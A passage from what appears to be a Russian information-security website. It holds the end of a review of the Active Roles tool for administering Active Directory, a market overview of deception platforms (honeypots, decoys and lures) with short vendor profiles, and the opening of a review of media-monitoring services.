веб-сервере. Все сделанные изменения вступают в силу незамедлительно. ВыводыПродукт Active Roles, обладая широким набором функций и возможностей, на удивление прост в установке и настройке. Для его работы не требуется наличие какого-либо специализированного и мощного оборудования. Напротив, используются только стандартные инфраструктурные компоненты производства компании Microsoft. При этом благодаря заложенной архитектуре и принципам работы, решение обладает практически неограниченным потенциалом для масштабирования.Достоинства:Наличие «виртуальной» схемы, в дополнение к существующей, физической схеме Active Directory позволяет расширять функциональность, не требуя каких-либо изменений в конфигурации Active Directory.Архитектура прокси-администрирования (т. е. работа с живым сервисом Active Directory, без необходимости вычитывать и хранить информацию об объектах Active Directory в какой-то отдельной базе данных) позволяет работать с неограниченным количеством доменов и неограниченным количеством объектов в доменах без потери производительности, с полным контролем всех операций. Это же архитектурное решение обеспечивает широкие возможности по расширению функциональности продукта и интеграции с другими системами.Проверка эффективных прав доступа (полномочий) в момент совершения любой операции (т. е. в реальном времени), разграничение доступа по модели «минимально необходимого набора полномочий» обеспечивает максимальный контроль и безопасность администрирования Active Directory и связанных с ним сервисов. Назначение (делегирование) прав доступа производится через гибко настраиваемые шаблоны. В итоге пользователь (администратор) видит только те объекты, к которым у него есть доступ, и может выполнять только разрешенные ему команды.Встроенный механизм подтверждения операций (третьими лицами, по настроенной цепочке), а также механизм временного членства в группах также помогают обеспечить безопасное и контролируемое управление средой на основе Active Directory.Возможность создания репозитория скриптов, используемых для автоматизации операций, контроль их модификации, а также встроенная мощная функциональность рабочих процессов помогают внести ясность в сложные и, вероятно, недокументированные процессы и средства автоматизации, используемые в компании в данный момент.Встроенный сервис синхронизации помогает автоматизировать процессы, связанные с кадровыми событиями (прием сотрудников на работу, перевод, увольнение) и сопряженные с ними переназначения прав доступа, их блокировка.Полностью настраиваемый тонкий клиент (веб-интерфейс) без необходимости скриптинга позволяет добавлять новые команды, формы, изменять существующие, подстраивать под практически любые задачи.Недостатки: Графический интерфейс толстого клиента Active Roles в силу использованной технологии Microsoft Management Console (MMC) тяжело кастомизировать. Но наличие гибкого веб-интерфейса спасает ситуацию.Делегирование прав (полномочий), как и большинство «внутренних» настроек продукта, выполняется в MMC-интерфейсе. Настроек много, потребуется некоторое время, чтобы понять и запомнить, где и что настраивается. Хотя, по нашим данным, в One Identity ведется работа по переносу настроечной части в веб-интерфейс с сопутствующей оптимизацией и улучшением процесса настройки и использования.В следующих частях обзора, посвященного Active Roles, мы расскажем о функциональности запроса доступа (членства в группе) через портал самообслуживания, а также возможностях Active Roles по управлению гибридной средой — облачными сервисами Microsoft Azure Active Directory и Office 365 (Exchange Online, SharePoint Online).За помощь в создании материала автор благодарит Романа Каляпичева, консультанта по корпоративным решениям компании One Identity.первая>
Обзор рынка платформ для создания распределенной инфраструктуры ложных целей (Distributed Deception Platform)
April 10, 2019, 11:43 pm

Платформы для создания распределенной инфраструктуры ложных целей (Distributed Deception Platform — DDP) являются развитием идеи ханипотов и создают поддельную ИТ-инфраструктуру, привлекательную для злоумышленников. Ложные цели помогают обнаружить присутствие злоумышленников в сети, если им удалось успешно обойти все средства защиты, и отвлекают их внимание от основных ресурсов предприятия. ВведениеТехнологии создания ложных целейМировой рынок Distributed Deception PlatformРоссийский рынок Distributed Deception PlatformКраткий обзор популярных платформ5.1. DeceptionGrid, TrapX Security5.2. Fidelis Deception, Fidelis Cybersecurity5.3. GuardiCore Centra5.4. IllusionBLACK, Smokescreen Technologies5.5. Illusive Platform, Illusive networks5.6. MazeRunner, Cymmetria5.7. Shadowplex, Acalvio Technologies5.8. ThreatDefend Detection and Response Platform, Attivo NetworksВыводы ВведениеХорошо выстроенная система информационной безопасности позволяет отражать большинство массовых кибератак, но перед целевыми атаками устоять гораздо сложнее. А если превентивные средства (межсетевые экраны, системы предотвращения вторжений и антивирусные средства) не сработали, страшнее оказывается тот факт, что атака может оставаться незамеченной месяцы или даже годы, позволяя злоумышленнику закрепиться в инфраструктуре предприятия и красть данные. В такой напряженной борьбе, когда злоумышленники постоянно совершенствуют и находят всё новые методы атак, важным элементом защиты становится применение новейших технологий для защиты от продвинутых атак.В качестве одного из путей совершенствования системы информационной безопасности стоит рассмотреть применение технологий Deception (с англ. — «обман»), попавших в рейтинг лучших технологий для информационной безопасности в 2017 году по версии Gartner. Технологии Deception призваны затруднить исследование реальной ИТ-инфраструктуры, задержать активные действия злоумышленника, отвлекая его внимание от реальных ресурсов предприятия, и своевременно обнаружить атаку, заставив злоумышленника выдать себя. Использование технологий Deception позволит с крайне низким уровнем ложных срабатываний обнаруживать злоумышленников, уже проникших в корпоративную сеть предприятия и старающихся там закрепиться. Технологии создания ложных целейТехнологии Deception, или по-русски «технологии обмана» (от англ. deception technologies) — совокупность техник имитации ИТ‑инфраструктуры и дезинформации злоумышленников, используемых с целью обнаружения и замедления продвижения атак злоумышленников и позволяющих в итоге останавливать атаки до нанесения значимого ущерба.Развитие технологий обмана атакующих начинается с 1990-х годов — именно тогда появились первые honeypot («ханипот» — ресурс-приманка), предназначенные для привлечения внимание злоумышленника и его обнаружения. Чаще всего honeypot представляет собой выделенный сервер или сервис на реальной системе, реализующий различные сетевые службы и протоколы, например HTTP, FTP и Telnet. Недостаток этих средств — сложность администрирования и технического сопровождения, к тому же ошибочная конфигурация honeypot может привести к использованию его злоумышленником при проведении атаки.Современные технологии обмана злоумышленника эволюционировали и представлены в решениях нового класса — Distributed Deception Platform (DDP), или Deception Platform, или платформах для создания распределенной инфраструктуры ложных целей, для которых характерны автоматизация и легкость развертывания, централизованное управление, а также широкий арсенал ловушек и приманок.С помощью централизованной системы управления по сети предприятия размещаются ловушки (от англ. decoys) — эмулированные устройства или устройства под управлением реальных операционных систем (Windows или Linux) с различными наборами сервисов. Так как у обычных пользователей нет легитимных причин обращаться к этим устройствам, любая попытка взаимодействия с ними будет считаться злонамеренной. Цель размещения ловушек заключается в том, чтобы привлечь внимание злоумышленника, отвлечь его от реальных ресурсов предприятия и занять на некоторое время, и при этом собрать информацию о местоположении атакующего, его инструментах и методах атак — то есть всё необходимое, чтобы обнаружить и остановить пропущенную атаку.Сложность ловушек варьируется от имитации простых сетевых сервисов, таких как SMB, RDP, SSH, HTTP(S), MySQL и иных, до имитации таких устройств, как коммутаторы, банкоматы, POS-терминалы, устройства интернета вещей (IoT), медицинское оборудование и SCADA-системы. А количество ловушек, размещенных в сети предприятия, может достигать нескольких тысяч.Таким образом, злоумышленник неизбежно столкнется с ловушками при разведке сети или следуя за приманками. Приманки (от англ. lures), или «хлебные крошки» (от англ. breadcrumbs) — это подложные данные, размещаемые на реальных устройствах сети, например: учетные данные для подключения по RDP в диспетчере учетных данных Windows, по SSH — в истории команд, к веб-приложению — в файлах cookie и так далее. Другим примером могут служить ложные массивы данных, например конфиденциальные документы, базы данных, которые заинтересуют злоумышленников.Технологии обмана атакующих наиболее эффективны на ранних стадиях атаки, когда злоумышленники собирают данные об инфраструктуре, анализируют их и используют для горизонтального продвижения по сети. В то же время применение технологий обмана потенциально возможно на всех этап атаки по модели Cyber Kill Chain. Поддельный слой инфраструктуры, создаваемый с использованием ловушек и приманок, позволяет использовать тактику злоумышленников против них.Самая важная черта ловушек и приманок — это, пожалуй, их реалистичность, ведь если злоумышленник сможет понять, что это обман, ловушка не сработает. И чтобы добиться неотличимости от реальных ресурсов, производители решений данного класса прибегают к передовым методам: машинному обучению, использованию искусственного интеллекта и другим. При этом ловушки и приманки обычно генерируются на основе анализа сети и являются ориентированными на специфику организации, с учетом возможных векторов атак.В итоге инфраструктура организации начинает состоять из двух слоев: реального и поддельного. Причем поддельный слой выглядит гораздо более привлекательным и заманчивым для злоумышленника. Развернутые ловушки и приманки «принимают удар на себя», увлекают злоумышленника в сети фиктивной инфраструктуры, тем самым выигрывая время для принятия контрмер, что приводит к сохранности реальных активов. В дополнение появляется возможность наблюдать за действиями злоумышленника, анализировать его инструменты и предупреждать подобные атаки в будущем. В то же время платформы для создания распределенной инфраструктуры ложных целей быстры в развертывании, не нагружают работой ИТ-подразделения и не создают шум для ИБ-подразделения множеством ложных срабатываний. Рисунок 1. Применение технологий обмана злоумышленников Мировой рынок Distributed Deception PlatformСогласно аналитическому отчету Gartner (Hype Cycle for Threat-Facing Technologies, 2018), рынок платформ Distributed Deception Platform (DDP) находится на ранней стадии развития. Причем решение данного класса становится ценным дополнением к более традиционным (например, SIEM) или новым (например, UEBA или NTA) решениям для обнаружения угроз, связанных с горизонтальным продвижением злоумышленников в ИТ‑инфраструктуре предприятий. В названном выше отчете выделяются следующие основные производители платформ DDP (в алфавитном порядке): Acalvio Technologies, Attivo Networks, Cymmetria, Fidelis Cybersecurity, GuardiCore, Illusive Networks, Smokescreen Technologies и TrapX Security. Помимо них заслуживают внимание: Rapid7, CounterCraft и Symantec (поглотившая Javelin Networks).Применение новых стратегий для комплексной защиты от сложных целевых атак особенно актуально для крупных предприятий, находящихся в группе высокого риска — например, в финансовой, государственной, производственной и иных сферах. А возможность имитации специализированных устройств позволяет применять данные решения в медицинской и промышленной сферах (включая КИИ — критическую информационную инфраструктуру), где не всегда возможно применение традиционных решений.Представителями рынка платформ DDP являются, как правило, молодые компании (средний возраст — 5 лет), основанные в США или Израиле, специализирующиеся именно на технологиях обмана злоумышленников и обладающие собственными запатентованными технологиями.В качестве основной тенденции на рынке можно выделить стремление к дифференциации. Во-первых, чтобы быть больше, чем классический honeypot, среди которых имеется достаточно хороших бесплатных вариантов. А во-вторых, чтобы составлять конкуренцию игрокам на рынке платформ DDP. Так разрабатываются не только мощные возможности и широкие наборы функций, способные генерировать ложные данные из реальных ИТ-активов, но также и узкоспециализированные IoT-устройства, медицинское и производственное оборудование.Стоит отметить, что технологии обмана находят применение не только в качестве специализированных платформ DDP, но и как часть комплексных решений по защите информации, а также могут дополнять функции других классов средств защиты информации, например, межсетевых экранов, систем обнаружения вторжений и решений по защите конечных устройств. В связи с этим выделяется тенденция к всевозможным интеграциям платформ DDP с другими классами средств защиты информации, которая позволяет автоматизировать реагирование на инциденты, например, блокировать IP-адреса источников атак на межсетевом экране, собирать данные контрразведки для Threat Intelligence и многое другое.Относительно низкий уровень принятия решений класса DDP обусловлен в основном тем, что большинство предприятий традиционно фокусируются на превентивных мерах безопасности, и меньше на возможностях обнаружения пропущенных атак и реагировании на них. Тем не менее в условиях постоянных атак на критически важные организации повышаются требования, в том числе регуляторные, к уровню обнаружения угроз, что, вероятно, приведет к увеличению спроса на продукты, ориентированные на обнаружение, включая платформы DDP.Стоимость решений класса DDP составляет в среднем от $20.000 до $50.000 в год для компаний среднего размера, при этом политика лицензирования, как правило, опирается на количество VLAN (например, 1 VLAN — $1000), и реже на количество защищаемых ресурсов (например, $60 на 1 пользователя).На данный момент аналитические компании оценивают совокупный объем глобального рынка платформ DDP более $1 млрд и прогнозируют ежегодный рост в среднем на 14-15% в течение ближайших лет (ссылки здесь и здесь). Однако, согласно другим экспертным оценкам, объем глобального рынка платформ DDP в $1 млрд сильно завышен и на практике составляет не более $100 млн в год. Российский рынок Distributed Deception PlatformВ России рынок платформ DDP только зарождается. Из зарубежных производителей наиболее активно представлено несколько компаний: Illusive Networks, Guardicore и TrapX Security. Для российского рынка характерно, что даже крупные организации в критически важных сферах пока не понимают, какую пользу способны принести решения данного класса и стоит ли этот подход вложений. Отчасти это объясняется относительной новизной решений и недавним появлением на зарубежном рынке продуктов данного класса (активно с 2016 года), а также сравнительно малым количеством русскоязычных публикаций, освещающих применение платформ DDP.Совокупный объем российского рынка оценивается не более чем в $500 тыс.Тем не менее платформы DDP вызывают живой интерес у заказчиков, и ниже мы рассмотрим основные из известных в России решений данного класса. Краткий обзор популярных платформDeceptionGrid, TrapX SecurityКомпания TrapX Security была основана в Израиле в 2011 году, центральный офис в настоящее время находится в США.Платформа DeceptionGrid, сканируя существующую сеть предприятия, автоматически предлагает адаптированную для конкретной среды архитектуру ловушек и приманок (токенов).Приманки в виде обычных файлов, баз данных или кэшированных учетных данных размещаются на реальных ИТ-активах и привлекают внимание злоумышленника к ловушкам, отвлекая от реальных ценных активов.Ловушки платформы DeceptionGrid различаются по степени взаимодействия со злоумышленником. Ловушки со средним уровнем взаимодействия представляют собой эмулированные серверы, рабочие станции, сетевое оборудование и т. д. Кроме того, существует возможность создания ловушек в виде банкоматов, POS-терминалов, медицинского и производственного оборудования и других специализированных устройств. Ловушки со средним уровнем взаимодействия перенаправляют злоумышленника в зависимости от типа атакуемой службы или протокола (AD, MS SQL, HTTP, WMI, SMB, CMD) в ловушку с высоким уровнем взаимодействия, которая представляет собой полноценную операционную систему (FullOS) и может даже быть полной копией реальных производственных серверов.Платформа DeceptionGrid предоставляет удобный интерфейс для анализа инцидентов, включающий визуализацию атак и детальные данные о событиях безопасности. Рисунок 2. Визуализация атаки в веб-интерфейсе платформы DeceptionGrid Основные преимущества платформы DeceptionGrid:Архитектура решения объединяет в себе преимущества токенов, эмулируемых ловушек и ловушек FullOS для более быстрого обнаружения, глубокого взаимодействия со злоумышленником и комплексного сдерживания угроз.Ловушки в виде отраслевых устройств, включая медицинские устройства, банкоматы, POS-терминалы, устройства интернета вещей и многое другое.Автоматизированный анализ действий вредоносных программ и инструментов злоумышленников, а также модуль расширенного реагирования на инциденты (AIR), позволяющий анализировать память любого конечного устройства, которое могло быть уже взломано.Автоматическое развертывание ловушек, а также их динамическое изменение (например, после взаимодействия со злоумышленником).Открытые API и SDK, позволяющие расширять возможности интеграции и автоматизации, а также самостоятельно создавать собственные виды ловушек, имитирующих специфическое оборудование.Организованное компанией TrapX Security сообщество DeceptionNet Community позволяет группам кибербезопасности обмениваться стратегиями обмана, новыми видами ловушек, коннекторами к сторонним системам и многим другим.Как обмануть злоумышленников с помощью ловушек TrapX DeceptionGrid, мы недавно писали в статье.Подробнее с платформой DeceptionGrid можно познакомиться на сайте TrapX Security, а также на сайте официального дистрибьютора Softprom by ERC.Fidelis Deception, Fidelis CybersecurityКомпания Fidelis Cybersecurity, основанная в 2002 году в США, предоставляет предприятиям решения по обнаружению угроз, защите от кражи данных и сетевой безопасности. В октябре 2017 году компания Fidelis Cybersecurity приобрела компанию TopSpin Security, одного из ведущих поставщиков технологий ложных целей. Решение TopSpin DECOYnet, получившее новую марку — Fidelis Deception, претерпело волну изменений и стало частью платформы Fidelis Elevate с целью расширения возможностей проактивного и автоматического обнаружения и реагирования на злонамеренные действия. В состав платформы Fidelis Elevate также входят Fidelis Network — система обнаружения угроз и предотвращения утечки данных на уровне сети предприятия, и Fidelis Endpoint — решение класса Endpoint Detection and Response (EDR).Решение Fidelis Deception инвентаризирует сети и ресурсы предприятия, включая активы, операционные системы, сервисы, порты и данные, а затем на основе результатов анализа автоматически создает ловушки и приманки, максимально реалистичные для обнаружения атак после взлома периметра предприятия.Полагаясь на эмуляцию ловушек, а не на использование реальных операционных систем, решение Fidelis Deception не оказывает влияния на окружающую среду и не требует привилегированных учетных данных при развертывании ловушек.Благодаря совместному использованию Fidelis Deception и EDR-решения Fidelis Endpoint появляются широкие возможности по исследованию скомпрометированных конечных устройств, на которых были размещены «хлебные крошки», использование которых привело к возникновению инцидента. Рисунок 3. Панель инцидентов Fidelis Deception Основные преимущества решения Fidelis Deception:Является частью комплексной платформы Fidelis Elevate для обнаружения угроз и реагирования на них.Автоматическое обнаружение сетей, активов и приложений, уникальных для каждого предприятия, позволяющее создавать максимально реалистичные для каждой среды ловушки и приманки, а также адаптировать их при изменениях в инфраструктуре. Подробнее с платформой Fidelis Deception можно ознакомиться на сайте Fidelis Cybersecurity.GuardiCore CentraКомпания GuardiCore, основанная в 2013 в Израиле, позиционируется как лидер в области безопасности центров обработки данных и гибридных облаков и является обладателем множества престижных наград. Флагманский продукт GuardiCore Centra обеспечивает видимость приложений на уровне процессов, микросегментацию политик безопасности и обнаружение нарушений в реальном времени.Платформа GuardiCore Centra предназначена прежде всего для обнаружения нарушений в центрах обработки данных и использует несколько методов: обнаружение на основе политик безопасности, репутационный анализ и динамическое создание ложных целей.Микросегментация политик безопасности существенно затрудняет попытки злоумышленника остаться незамеченным при продвижении по ИТ‑инфраструктуре, но в свою очередь требует полного и детального представления приложений и потоков в ИТ‑инфраструктуре. Платформа GuardiCore Centra собирает сетевые данные от агентов или SPAN-портов, агрегирует данные об активности приложений и представляет их в наглядной форме, позволяя указать, санкционирована ли та или иная сетевая активность, вплоть до конкретных используемых портов.С помощью репутационного анализа в трафике обнаруживаются подозрительные доменные имена, IP-адреса и хэши файлов.Платформа GuardiCore Centra применяет запатентованную технологию динамического обмана для анализа всех неудачных попыток горизонтального перемещения. Неудачные соединения прозрачно перенаправляются на ловушки с высоким уровнем взаимодействия, которые в ответ на попытки атаки злоумышленника выдают ответы, предполагающие, что атака прошла успешно (например, при подборе пароля — одна из попыток окажется удачной), в то время как все действия, инструменты и эксплойты злоумышленника записываются и анализируются в полностью изолированной среде.Для снижения времени реагирования на инциденты возможна интеграция с шлюзами безопасности Palo Alto Networks, Check Point, Cisco, чтобы заблокировать атаку, а также имеется возможность инициировать действия на виртуальных машинах — приостановить, отключить или сделать снимок, например, чтобы предотвратить распространение ущерба от атак вымогателей. Рисунок 4. Панель мониторинга GuardiCore Centra Основные преимущества платформы GuardiCore Centra:Является комплексным решением для защиты облачных, гибридных и приватных ЦОДов с использованием подхода Zero Trust — отсутствия доверия между элементами ЦОДа по умолчанию.Детальная видимость в инфраструктуре, вплоть до процессов на узлах.Мощный движок создания правил микросегментации позволяет создавать политики за минуты.Применение уникальной технологии обнаружения атак с использованием интерактивных ловушек.Возможность реагирования на инцидент из веб-интерфейса — инициирование приостановки, выключения или создания снимка виртуальной машины.Платформа GuardiCore Centra поддерживает виртуализацию KVM, Xen, VMware ESX 5.1 и выше, а также облачные платформы Amazon Web Services, Microsoft Azure, Oracle OPC, Google Cloud Platform.Подробнее с платформой GuardiCore Centra можно познакомиться на сайте GuardiCore.IllusionBLACK, Smokescreen TechnologiesКомпания Smokescreen Technologies, основанная в 2015 году в Индии, позиционируется как команда олдскульных хакеров, которые однажды разочаровались в защитных продуктах, которые «не сработали», и задались вопросом «что может поймать таких парней, как мы?» Так появился их флагманский продукт IllusionBLACK.Платформа IllusionBLACK обладает широким арсеналом ловушек и приманок, от эмуляции базовых сетевых сервисов (например, HTTP, SSH и FTP) до подложных адресов электронной почты и номеров телефонов, призванных обнаружить попытки социальной инженерии. А технология MirageMaker позволяет автоматически генерировать ложные данные, включая номера кредитных карт, номера социального страхования (США), файлы и другое, экономя время на создание реалистичных приманок.Как только злоумышленник будет обнаружен, платформа IllusionBLACK на лету перенаправит атаку для удержания злоумышленника в виртуальную сеть ловушек, построенную на базе операционной системы BSD Unix и максимально похожую на реальную ИТ‑инфраструктуру, чтобы занимать злоумышленника до нескольких дней.Платформа IllusionBLACK предлагает еще одну полезную технологию — ThreatParse, которая переводит необработанные данные об атаке на простой английский язык и визуально воспроизводит атаку от начала до конца. Рисунок 5. Графический интерфейс платформы IllusionBLACK Основные преимущества платформы IllusionBLACK:Автоматическая генерация ложных данных для создания реалистичных приманок, в том числе для обнаружения атак социальной инженерии.Перенаправление атак злоумышленника в виртуальную сеть ловушек для удержания его до нескольких дней.Возможность интеграции ловушек в веб- или мобильное приложение для защиты от атак на бизнес-логику. Подробнее с платформой IllusionBLACK можно познакомиться на сайте Smokescreen Technologies. Illusive Platform, Illusive networksКомпания Illusive networks, основанная в 2014 году в Израиле, специализируется на технологиях обмана и представляет решение Illusive Platform, основанное на подходе Deceptions Everywhere, который означает внедрение приманок на всех конечных устройствах предприятия.Решение Illusive Platform включает в себя основные компоненты:Система управления Deception Management System, используя машинное обучение, создает слой приманок на каждом конечном устройстве сети предприятия. Чтобы приманки в виде учетных данных, файлов и сервисов были неотличимы для злоумышленника от реальных данных, Deception Management System выявляет сетевые соединения, данные и потенциальные векторы атак и для каждого из векторов атаки создает приманку. При постоянном мониторинге сети предприятия сеть приманок не устаревает, а безагентное внедрение не создает проблем на конечных устройствах.Attack Surface Manager автоматизирует обнаружение и устранение нарушений политик хранения учетных данных, например кешированные учетные данные доменных администраторов или сохраненные пароли в браузерах, и позволяет анализировать пути к критически важным ресурсам.Attacker View визуализирует карту сети предприятия и определяет потенциальные векторы атак.Illusive Forensics предоставляет подробную информацию об инциденте, включая источник атаки и используемые злоумышленником инструменты.Решение Illusive Platform сочетает внедрение слоя приманок на уровне реальных узлов и применение высокоинтерактивных сетевых ловушек, предназначенных для задержания злоумышленников, сбора информации об их техниках, тактиках и процедурах (TTP) и записи действий.В качестве дополнительных модулей присутствуют компонент Wire Transfer Guard для защиты инфраструктуры SWIFT и компонент Mainframe Guard для защиты мейнфреймов. Рисунок 6. Карта сети предприятия с приманками Illusive Platform Основные преимущества решения Illusive Platform:Подход Deceptions Everywhere создает избыточное число вариантов для следующего шага злоумышленника при продвижении по сети, что потенциально позволит обнаружить атаку гораздо раньше, чем будут достигнуты критические данные.Позволяет взглянуть на сеть предприятия глазами атакующего, благодаря чему становятся наглядными слабые и наиболее уязвимые места в инфраструктуре, аномалии в связях между узлами и подсетями, а также возможные векторы атак злоумышленников.Используя информацию о потенциальных векторах атак, можно своевременно принять меры, устранить нарушения и защитить слабые места.Автоматический сбор форензики.Подробнее с платформой Illusive Platform можно познакомиться на сайте Illusive networks, а также на сайте официального дистрибьютора «Тайгер Оптикс».MazeRunner, CymmetriaКомпания Cymmetria была основана в 2014 году в Израиле и специализируется на технологиях обмана. Платформа MazeRunner нацелена на выявление горизонтального продвижения злоумышленника в защищаемой сети и предотвращение дальнейшей атаки.Платформа MazeRunner включает в себя ловушки с запущенными сервисами и приманки, централизованно управляемые через веб-интерфейс. Ловушки представляют собой виртуальные машины с реальными операционными системами, такими как Ubuntu 14 или Windows 2012 R2, и могут быть развернуты в разных местах сети предприятия. В каждой ловушке выполняются реальные сервисы: SMB, RDP, SSH, OpenVPN и т. д., к которым ведут «хлебные крошки», расположенные на конечных устройствах предприятия, например: учетные данные RDP или SSH, файлы cookie и соединения с общими папками и т. д. Рисунок 7. Панель управления развертыванием MazeRunner Основные преимущества платформы MazeRunner:Архитектура решения и веб-интерфейс просты и понятны. Для развертывания не требуются значительные вычислительные ресурсы. В то же время реализованы основные функции решений данного класса.Присутствуют две версии платформы: Community и Enterprise. Версия Community доступна для частного использования и в образовательных целях, а также для ознакомления коммерческих организаций в течение пробного периода.Для экспорта информации от платформы MazeRunner или автоматизации любых операций, доступных через веб-интерфейс, может использоваться MazeRunner API. Интеграция с решениями SIEM и Threat Intelligence возможна с использованием стандартов syslog и TAXII.С помощью решения ActiveSOC, другого продукта компании Cymmetria, интегрируемого с SIEM, возможности MazeRunner могут применяться для автоматического реагирования на инциденты и отсеивания ложных срабатываний. Автоматическое создание ловушек позволит проверять некоторые события SIEM, например, ниже пороговых значений, которые в противном случае могли бы игнорироваться аналитиками.Подробнее с платформой MazeRunner можно познакомиться на сайте Cymmetria.Shadowplex, Acalvio TechnologiesКомпания Acalvio Technologies была основана в 2015 году, имеет офисы в США и Индии и специализируется на технологиях обмана. Платформа ShadowPlex нацелена на обнаружение, вовлечение злоумышленников и реагирование на вредоносные действия внутри периметра предприятий и разработана специально для корпоративных и промышленных сред и интернета вещей.Платформа ShadowPlex предлагает широкий выбор приманок и ловушек, с использованием запатентованных технологий платформа ShadowPlex эмулирует работу IoT-устройств, маршрутизаторов, коммутаторов, медицинского и производственного оборудования.Платформа ShadowPlex использует искусственный интеллект на этапах определения стратегий развертывания ловушек и приманок, генерации их содержимого и взаимодействия со злоумышленником, благодаря чему значительно сокращаются усилия по развертыванию и повышается эффективность обнаружения.Особенностью платформы ShadowPlex является размещение всех ловушек в централизованной ферме виртуальных серверов (Deception Farm). Ловушки проецируются в расположенные в сегментах сети сенсоры. Данный подход обеспечивает масштабируемость и адаптируемость платформы к изменениям в ИТ‑инфраструктуре.Платформа ShadowPlex позволяет защищать как собственные ресурсы предприятия, так и облачную ИТ‑инфраструктуру. С помощью API поддерживается интеграция платформы в существующую комплексную систему безопасности, включая межсетевые экраны, SIEM, Network Access Control и другие. Рисунок 8. Панель мониторинга ShadowPlex Основные преимущества платформы ShadowPlex:Централизованное размещение ловушек и проецирование их в инфраструктуру через сенсоры, которые подключаются к сетевому оборудованию, в том числе в удаленных офисах.При развертывании возможно использовать не только результаты сканирования сети, но и собственные данные из инструментов управления ресурсами или сканеров уязвимостей.Поддерживается проецирование поведения ресурсов, которые сложно эмулировать, например: IoT-устройств, медицинского и производственного оборудования, маршрутизаторов, коммутаторов, контроллеров ICS и так далее.Подробнее с платформой ShadowPlex можно ознакомиться на сайте Acalvio Technologies.ThreatDefend Detection and Response Platform, Attivo NetworksКомпания Attivo Networks, основанная в США в 2011 году, представляет решение ThreatDefend Detection and Response Platform, предназначенное для обнаружения атак внутри сети предприятий с использованием технологий обмана. Данная платформа применима в специализированных сетях систем SCADA, интернета вещей, POS-терминалов и других. Решение ThreatDefend Detection and Response Platform включает компоненты:BOTsink — система централизованного управления сетевыми ловушками.ThreatStrike — безагентная система управления приманками на конечных устройствах, предназначенная для обнаружения кражи учетных данных и вирусов-вымогателей.ThreatDirect— расширяет возможности располагаемого в центральном офисе компонента BOTsink в облачных средах, филиалах или удаленных офисах, не тратя дополнительных ресурсов.ThreatPath — визуализирует возможные векторы атак в сети предприятия, позволяя вовремя обнаружить учетные данные и другие нарушения политики безопасности на конечных устройствах, которые злоумышленник может использовать при развитии атаки.ThreatOps — автоматизирует реагирование на инциденты с помощью создаваемых сценариев (playbooks). Рисунок 9. Панель мониторинга ThreatDefend Detection and Response Platform (компонент BOTsink) Основные преимущества решения ThreatDefend Detection and Response Platform:Широкие возможности для масштабирования и подключения удаленных офисов.Визуализация потенциальных векторов атак, способствующая своевременному принятию превентивных мер.Поддерживаются специализированные устройства: IoT, SCADA, POS, сетевое телекоммуникационное оборудование.Для экспорта информации об атаках и автоматизации реагирования возможна интеграция с множеством решений партнеров, включая IBM QRadar, McAfee, Splunk, Check Point, Cisco, Palo Alto Networks, Symantec и другие.Подробную информацию о решении ThreatDefend Detection and Response Platform можно найти на сайте Attivo Networks. ВыводыСледует отметить, что данный класс средств защиты предназначен быть последним рубежом обороны предприятий, когда злоумышленник получил доступ к ресурсам предприятия, преодолев все эшелоны защиты. Фактически платформы для создания распределенной инфраструктуры ложных целей (Distributed Deception Platform) используются для обнаружения успешной атаки, позволяя, во-первых, обнаружить внедрившегося злоумышленника, а во-вторых, отвлечь внимание атакующих от настоящих целей.Данные технологии определенно являются очень перспективными в контексте обнаружение целевых атак, и, безусловно, будут востребованы на российском рынке. Стоит надеяться, что отечественные вендоры возьмут данные технологии на вооружение. К сожалению, на текущий момент решений, ориентированных на российский рынок, нет.С технической стороны развитие технологий искусственного интеллекта и машинного обучения позволяет значительно снизить количество ручного труда специалистов информационной безопасности предприятий, связанного с развертыванием и настройкой ловушек, а также генерированием массивов ложной информации. Главным достоинством платформ Deception является практически полное отсутствие ложных срабатываний, так как любое взаимодействие с ловушками предполагает злой умысел.В конечном итоге ложные цели, бесспорно, станут обязательным элементом, который необходимо использовать крупным организациям, в том числе банковской и производственной сферы, при построении и совершенствовании своих систем киберзащиты.
Обзор рынка сервисов мониторинга открытых источников информации
April 16, 2019, 10:54 pm

Системы анализа упоминаний в открытых источниках стали популярны во всем мире. Мониторинг и анализ упоминаний в соцмедиа и СМИ помогает получить огромное количество данных из различных платформ социальных сетей, таких как Вконтакте, Facebook и Instagram, чтобы сформировать представление о потребителях, улучшить продукты и следить за конкурентами. Как развивается российский рынок мониторинга онлайн-источников и чем региональные участники отличаются от международных сервисов? ВведениеМировой рынок услуг мониторинга открытых источников информацииРоссийский рынок услуг мониторинга открытых источников информацииФункциональные возможности систем мониторинга открытых источников информацииОбзор систем мониторинга открытых источников информации5.1. Angry Scan5.2. Babkee5.3. Brand Analytics5.4. IQBuzz5.5. SCAN5.6. SemanticForce5.7. YouScan5.8. Катюша5.9. Крибрум5.10. МедиалогияВыводы ВведениеАнализ данных из открытых источников — перспективная технология, совмещающая в себе лингвистические алгоритмы, математическое моделирование социальных процессов, социальную психологию и визуализацию больших данных.Услуги мониторинга открытых источников информации традиционно используют для управления репутацией — бренда, компании или персоны. Обычно специализированные сервисы собирают упоминания в публикациях в социальных сетях, блогах, новостях в онлайн-СМИ и комментариям по ключевым словам, относящимся к клиенту.В зависимости от специализации сервисы могут представлять собой как простой краулер, собирающий ссылки на упоминания, так и аналитический инструмент с настройками тональности упоминаний, количеством вовлечений, графиками распространения информации и многими другими дополнительными функциями.В последние годы сервисы сбора упоминаний чаще стали использоваться и для более широких бизнес-задач — таких как обнаружение информационных атак, оценка репутации контрагентов или определение психологического портрета и лояльности сотрудников. Кроме того, перспективным остается сфера применения таких услуг в конкурентной разведке и анализе общественного мнения по социально значимым вопросам. Мировой рынок услуг мониторинга открытых источников информацииПо данным агентства Mordor Intelligence, по состоянию на 2017 год мировой рынок услуг анализа публикаций в социальных сетях оценивался в 3 млрд долларов США и, согласно прогнозам, достигнет 16 млрд долларов США к 2023 году. Конкурентная среда на мировом рынке инструментов для мониторинга СМИ и соцмедиа определяется интенсивной конкуренцией между ведущими вендорами, такими как Hootsuite, Cision US, Meltwater, Agility PR Solutions, Mention, Trendkite, M-Brain, Critical Mention, Talkwalker, Brandwatch и BurrellesLuce. До сих пор для сохранения рыночных позиций эти компании полагались на постоянное расширение функциональности сервисов, запуск новых сопроводительных продуктов и услуг. Однако в последние годы фокус их внимания все больше смещается в сторону экспансии на различные региональные рынки, для чего они скупают региональных вендоров или заключают эксклюзивные партнерские соглашения.Кроме того, собственные решения для аналитики социальных сетей начали внедрять IBM, Oracle, а также Amazon, Salesforce, Adobe и SAS. Кейсы этих компаний, помимо маркетинга, охватывают более широкие бизнес-задачи — информационная безопасность, управление персоналом, бизнес-аналитика. 